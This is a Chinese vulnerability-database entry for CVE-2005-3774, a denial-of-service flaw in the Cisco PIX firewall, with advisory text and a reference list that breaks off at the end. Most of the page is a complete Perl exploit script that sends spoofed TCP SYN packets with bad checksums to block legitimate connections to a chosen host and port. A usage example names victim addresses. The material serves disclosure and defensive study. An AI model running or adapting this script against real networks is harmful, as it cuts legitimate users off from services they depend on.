Cisco PIX 6.3欺骗TCP SYN报文拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109281 漏洞类型 设计错误
发布时间 2005-11-22 更新时间 2007-09-05
CVE编号 CVE-2005-3774 CNNVD-ID CNNVD-200511-314
漏洞平台 Hardware CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/26548
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200511-314
|漏洞详情
CiscoPIX是一款硬件防火墙解决方案。CiscoPIX在处理畸形的TCP连接报文时存在漏洞,远程攻击者可能利用此漏洞对合法访问源造成拒绝服务攻击。如果通过PIX防火墙发送了有错误校验和的TCPSYN报文的话,PIX就会阻断使用相同源和目标TCP端口及IP地址的新TCP连接,直到大约2分钟后才会允许新的连接。因此攻击者可以发送有错误校验和的特制TCP报文,将源/目标IP和端口设置为合法的主机。一旦PIX防火墙接收了这样的报文,就无法同恶意报文中所指定的凭据建立新的TCP会话,默认时间为2分钟2秒,之后会恢复正常运行。
|漏洞EXP
source: http://www.securityfocus.com/bid/15525/info

Cisco PIX is susceptible to a remote denial-of-service vulnerability when handling certain TCP SYN packets.

This issue allows attackers to temporarily block network traffic to arbitrarily targeted TCP services. By repeating the attack, a prolonged denial-of-service condition is possible.

This issue is tracked by the following Cisco Bug IDs:
- CSCsc14915: PIX 6.3 Spoofed TCP SYN packets can block legitimate TCP connections
- CSCsc16014: PIX 7.0 Spoofed TCP SYN packets can block legitimate TCP connections 

#!/usr/bin/perl
eval ("use Getopt::Long;");die "[error] Getopt::Long perl module is not installed \n" if $@;
eval ("use Net::RawIP;");die "[error] Net::RawIP   perl module is not installed \n" if $@;
eval ("use Term::ProgressBar;");die "[error] Term::ProgressBar perl module is not installed \n" if $@;
my $VERSION = "0.1";
print "$0, $PgmName, V $VERSION \n";
GetOptions ( 
	    "help" =>\$usage,
	    "device=s" => \$device, 
            "source=s" =>\$sourceip,
            "dest=s"=>\$destip,
            "sourcemac=s"=>\$sourcemac,
            "destmac=s"=>\$destmac,
            "port=n"=> \$tcpport,
            );

######################## Config option #############################################

my $timeout = "0,1"; # Timeout

if ($usage) {&usage;} 
              
if (!$device) {
 $device= 'eth0'; # Network device
}

if (!$destmac) {print "Dest MAC not found \n"; &usage;}
if (!$sourceip) {print "Source IP not found \n"; &usage;}
if (!$destip) {print "Dest IP not found \n"; &usage;}
if (!$tcpport) {print "TCP port not found \n"; &usage;}

my $syn="1"; # TCP SYN SET
my $tcpdata = "TEST";	       # TCP payload
my $count=0;

####################################################################################

#Initialize Progres Bar 
my $progress = Term::ProgressBar->new(32768);
$progress->minor(0);
$packet = new Net::RawIP;
$packet-> ethnew($device);


if (!$sourcemac) {
$packet -> ethset( dest => $destmac);
}else { 
$packet -> ethset( source =>$sourcemac, dest => $destmac);
}



for ($count=0; $count< 65537 ; $count++) {

$packet->set({

ip => {
saddr => $sourceip,
daddr => $destip 
},

tcp => {
	check => 0x0010 , # TCP Packet Checksum 0 for auto correct
	source => $count,
	dest => $tcpport,
	syn => $syn,
	data => $tcpdata
       }});
$packet->ethsend($timeout);
#$packet->send($timeout);

$progress->update($_);
$count++;
}

sub usage {
  print <<EOF ;
This program was originally written in the due course of writing
"Hacking Exposed Cisco Networks: Cisco Security Secrets and Solutions" book.
Tool author - Janis Vizulis, Arhont Ltd. (License GPL-2 ) Please send bugs 
and comments to info@arhont.com 

usage: $0 [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=MAC]
	  [--destmac=MAC] [--port=n]

Options:

  --help		This message
  --device		Network interface (defaut set eth0)
  --source		Victim source IP
  --dest		Victim destination IP
  --sourcemac		Victim source MAC
  --destmac		MAC Address of the gateway
  --port		TCP port 
  
Example: ./pixdos.pl --device eth0 --source 192.168.44.10 --dest 192.168.55.111 \
  --sourcemac 00:90:27:99:11:b6 --destmac 00:60:27:99:11:b6 --port 22 
EOF
  
  exit shift;
}
|参考资料

来源:US-CERT
名称:VU#853540
链接:http://www.kb.cert.org/vuls/id/853540
来源:XF
名称:cisco-pix-ttl-dos(25079)
链接:http://xforce.iss.net/xforce/xfdb/25079
来源:XF
名称:cisco-pix-tcp-data-field-dos(25077)
链接:http://xforce.iss.net/xforce/xfdb/25077
来源:BID
名称:15525
链接:http://www.securityfocus.com/bid/15525
来源:BUGTRAQ
名称:20060307RE:CiscoPIXembryonicstatemachine1bdataDoS
链接:http://www.securityfocus.com/archive/1/archive/1/427041/100/0/threaded
来源:BUGTRAQ
名称:20060307CiscoPIXembryonicstatemachineTTL(n-1)DoS
链接:http://www.securityfocus.com/archive/1/archive/1/426991/100/0/threaded
来源:BUGTRAQ
名称:20060307CiscoPIXembryonicstatemachine1bdataDoS
链接:http://www.securityfocus.com/archive/1/archive/1/426989/100/0/threaded
来源:BUGTRAQ
名称:20051122CiscoPIXTCPConnectionPrevention
链接:http://www.securityfocus.com/archive/1/archive/1/417458/30/0/threaded
来源:OSVDB
名称:24140
链接:http://www.osvdb.org/24140
来源:VUPEN
名称:ADV-2005-2546
链接:http://www.frsirt.com/english/advisories/2005/2546
来源:CISCO
名称:20051128ResponsetoCiscoPIXTCPConne